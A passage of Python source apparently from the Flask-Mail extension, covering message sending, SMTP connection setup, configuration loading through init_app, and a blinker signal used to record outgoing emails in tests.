response = app.test_client.get("/email-sending-view/")
assert len(outbox) == 1
assert outbox[0].subject == "testing"
You must have blinker installed in order to use this feature.
:versionadded: 0.4
"""
if not email_dispatched:
raise RuntimeError("blinker must be installed")
outbox = []
def _record(message, app):
outbox.append(message)
email_dispatched.connect(_record)
try:
yield outbox
finally:
email_dispatched.disconnect(_record)
def send(self, message):
"""
Sends a single message instance. If TESTING is True the message will
not actually be sent.
:param message: a Message instance.
"""
with self.connect() as connection:
return message.send(connection)
def send_message(self, *args, **kwargs):
"""
Shortcut for send(msg).
Takes same arguments as Message constructor.
:versionadded: 0.3.5
"""
return self.send(Message(*args, **kwargs))
def connect(self):
"""
Opens a connection to the mail host.
"""
app = getattr(self, "app", None) or current_app
try:
return Connection(app.extensions['mail'])
except KeyError:
raise RuntimeError("The curent application was"
" not configured with Flask-Mail")
class _Mail(_MailMixin):
def __init__(self, server, username, password, port, use_tls, use_ssl,
default_sender, debug, max_emails, suppress,
ascii_attachments=False):
self.server = server
self.username = username
self.password = password
self.port = port
self.use_tls = use_tls
self.use_ssl = use_ssl
self.default_sender = default_sender
self.debug = debug
self.max_emails = max_emails
self.suppress = suppress
self.ascii_attachments = ascii_attachments
class Mail(_MailMixin):
"""
Manages email messaging
:param app: Flask instance
"""
def __init__(self, app=None):
self.app = app
if app is not None:
self.state = self.init_app(app)
else:
self.state = None
def init_mail(self, config, debug=False, testing=False):
return _Mail(
config.get('MAIL_SERVER', '127.0.0.1'),
config.get('MAIL_USERNAME'),
config.get('MAIL_PASSWORD'),
config.get('MAIL_PORT', 25),
config.get('MAIL_USE_TLS', False),
config.get('MAIL_USE_SSL', False),
config.get('MAIL_DEFAULT_SENDER'),
int(config.get('MAIL_DEBUG', debug)),
config.get('MAIL_MAX_EMAILS'),
config.get('MAIL_SUPPRESS_SEND', testing),
config.get('MAIL_ASCII_ATTACHMENTS', False)
)
def init_app(self, app):
"""Initializes your mail settings from the application settings.
You can use this if you want to set up your Mail instance
at configuration time.
:param app: Flask application instance
"""
state = self.init_mail(app.config, app.debug, app.testing)
# register extension with app
app.extensions = getattr(app, 'extensions', {})
app.extensions['mail'] = state
return state
def __getattr__(self, name):
return getattr(self.state, name, None)
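# Hedged example (added for illustration, not part of the original module):
# the two supported initialization patterns. `app` is a Flask application
# configured with the MAIL_* settings read by init_mail above:
#
#   mail = Mail(app)        # direct initialization
#
#   mail = Mail()           # application-factory pattern
#   mail.init_app(app)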
signals = blinker.Namespace()
email_dispatched = signals.signal("email-dispatched", doc="""
Signal sent when an email is dispatched. This signal will also be sent
in testing mode, even though the email will not actually be sent.
""")
| [
"[email protected]"
] |